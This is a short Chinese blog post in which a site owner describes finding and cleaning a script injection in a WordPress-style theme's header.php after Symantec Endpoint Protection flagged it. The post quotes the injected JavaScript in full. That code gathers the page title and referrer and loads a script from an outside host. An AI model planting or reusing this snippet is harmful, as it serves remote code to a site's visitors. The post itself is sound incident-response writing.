SEP提示Mass Injection Website 19处理

2,646次阅读
没有评论

今天访问自己网站时 SEP 提示 [SID: 28821] 已禁止 Web Attack: Mass Injection Website 19 攻击。已禁止此应用程序的通信: C:PROGRAM FILES (X86)MOZILLA FIREFOXFIREFOX.EXE,然后就禁止访问网站, 客户端将禁止来自 IP 地址 x.x.x.x 的通信 (于接下来的 600 秒,即从 2016/1/28 9:15:24 到 2016/1/28 9:25:24)。

到 SEP 管理查询了下相关的信息,说是脚本注入。

https://www.symantec.com/security_response/attacksignatures/detail.jsp?asid=28821

然后登陆到 VPS 上检查最近被修改的文件

find -ctime -1 检查最近 1 天被修改的文件

发现除了 cache 和 sitemap 之外只有一个主题下的 header.php 文件被修改。

打开这个文件和之前备份对比,发现在每个 </head> 之前都被加了一行代码

<script>var a=''; setTimeout(10); var default_keyword = encodeURIComponent(document.title); var se_referrer = encodeURIComponent(document.referrer); var host = encodeURIComponent(window.location.host); var base ="http://theclassicalfourplus1.com/js/jquery.min.php"; var n_url = base +"?default_keyword="+ default_keyword +"&se_referrer="+ se_referrer +"&source="+ host; var f_url = base +"?c_utt=snt2014&c_utm="+ encodeURIComponent(n_url); if (default_keyword !== null && default_keyword !=='' && se_referrer !== null && se_referrer !== ''){document.write('<script type="text/javascript" src="'+ f_url +'">'+'<'+'/script>');}</script>

删除这行代码,并将 header.php 文件权限设定为 444。

至于问题基本解决。

Winter
版权声明:本站原创文章,由 Winter 2016-01-28发表,共计1048字。
转载说明:除特殊说明外本站文章皆由CC-4.0协议发布,转载请注明出处。
评论(没有评论)
验证码
载入中...